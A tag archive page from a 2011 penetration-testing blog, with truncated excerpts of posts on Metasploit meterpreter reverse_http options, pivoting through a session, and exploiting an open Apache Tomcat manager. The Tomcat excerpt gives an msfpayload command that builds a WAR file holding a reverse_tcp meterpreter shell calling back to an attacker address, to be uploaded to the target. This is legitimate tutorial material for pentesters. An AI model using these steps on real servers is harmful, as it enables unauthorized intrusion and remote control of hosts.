meterpreter

Meterpreter’s new reverse_http and reverse_https options

Published July 7, 2011 | By phillips321

So we’ve all been unlucky enough to have a meterpreter session die on us, and then we’ve all been unlucky enough that we cannot re-exploit the box using the same vulnerability for some reason or another.

No one I know in the White Hat scene likes to use any form of persistence with a payload; and you’d be nuts to use the bind_tcp option through fear of leaving it running.… Continue reading →

Posted in metasploit | Tagged http, https, metasploit, meterpreter | 6 Comments

Pivoting through a meterpreter session

Published June 20, 2011 | By phillips321

So you’ve owned a box and now you want to exploit others using the first as a pivot. First thing to do is background your current meterpreter session:

1234567meterpreter > background msf exploit(multi_handler) > sessions -l Active sessions =============== Id Type Information … Continue reading →

Posted in Networking | Tagged metasploit, meterpreter, pivot, portforward, portfwd, route, sessions | Leave a comment

Apache Tomcat – exploiting an open management interface

Published May 22, 2011 | By phillips321

So, you’ve just brute forced the admin password for the Tomcat web app manager and you want to take it a step further…. step in metasploit.

msfpayload can create a WAR file containing a payload which you can upload to the target and exploit the box.

1./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=4545 W >; /root/MetRev.war

Log into the interface at http://192.168.1.112:8080/manager/html and upload the payload.

Once uploaded you then need to connect… Continue reading →

Posted in Uncategorized | Tagged 8080, admin, apache, meterpreter, Tomcat, war | 2 Comments

phillips321.co.uk

pen testing, security and linux

Meterpreter’s new reverse_http and reverse_https options

Pivoting through a meterpreter session

Apache Tomcat – exploiting an open management interface

Recent Posts

Meta

Links